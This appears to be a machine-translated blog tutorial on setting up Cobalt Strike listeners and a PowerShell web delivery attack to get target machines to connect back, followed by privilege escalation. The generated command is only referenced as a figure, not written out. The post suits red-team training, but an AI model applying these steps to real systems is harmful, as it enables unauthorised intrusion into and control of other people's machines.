After reading some information on the Internet, the latest cobaltstrike teaching video has been released on the b station, basic teaching, you can learn. It's from Hetian.com . ps: The voice of the young lady in the video is very sweet.
If there is some information that cannot be found on the Internet, you have to go to the official website to look at the documents, and you may gain something -- Portal
overview
The first step in any engagement is to set up the infrastructure. In the case of Cobalt Strike, the infrastructure consists of one or more team servers, redirectors, and DNS records pointing to your team servers and redirectors. Once your team server is up and running, you will need to connect to it and configure it to accept connections from infected systems. Listeners are the mechanism by which Cobalt Strike does this.
A listener is both a payload's configuration information and Cobalt Strike's instructions for setting up a server to accept connections from that payload. A listener consists of a user-defined name, the type of payload, and several payload-specific options.
When opening the client, many of the following operations will involve the listener, for example: generating a Trojan. The payload generated by cs needs to be transmitted to the target server, and the server is connected to the payload. The server needs to start a monitor first, so that the payload can find the server. ----Mountains and rivers
open listener
name: random
payload: Different types, generally select the first three
http address: server address --- the same as the following (stager)
http port: listening port
⚠️It should be noted here that the pitfall encountered is that the web address already exists and cannot be created. At this time, just change the port.
⚠️⚠️⚠️There is also the ⚠️security group of the server, ⚠️the firewall must be set up, the firewall should be closed or the corresponding port should be opened, and the security group should also be set, otherwise the connection cannot be established.
The server interacts with the target machine.
Set up a web delivery attack
Local port: can be customized
Listener: Select the one you just set up
Type: powershell
After clicking Run-the following figure will be generated-copy it to the window and run it
It is possible to get here, but there is no response to input ---- go to the security group and firewall of the server to see if there is a problem.
At this time, the target machine connection will be displayed.
Operations such as privilege escalation can be performed.
=======Splitting line
theoretical knowledge
